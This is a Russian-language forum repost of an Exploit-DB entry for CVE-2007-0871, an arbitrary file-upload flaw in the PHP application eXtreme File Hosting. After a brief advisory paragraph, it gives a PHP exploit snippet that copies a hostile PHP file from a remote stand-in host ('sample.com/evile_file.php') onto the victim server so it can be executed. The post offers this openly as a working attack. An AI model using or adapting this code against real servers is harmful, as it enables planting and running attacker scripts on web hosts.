Exploit eXtreme File Hosting - Arbitrary '.RAR' File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29574
Проверка EDB
  1. Пройдено
Автор
HAMED BAZARGANI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-0871
Дата публикации
2007-02-09
eXtreme File Hosting - Arbitrary '.RAR' File Upload
PHP:
source: https://www.securityfocus.com/bid/22498/info

eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to upload and execute arbitrary PHP script code in the context of the affected webserver process. This may help the attacker compromise the application; other attacks are possible. 

<?php
$file = 'http://sample.com/evile_file.php';
$newfile = 'evile_file.php';
if (!copy($file, $newfile)) {
   echo "failed to copy $file...\n";
}else{
   echo "OK file copy in victim host";
}
 
Источник
www.exploit-db.com

Похожие темы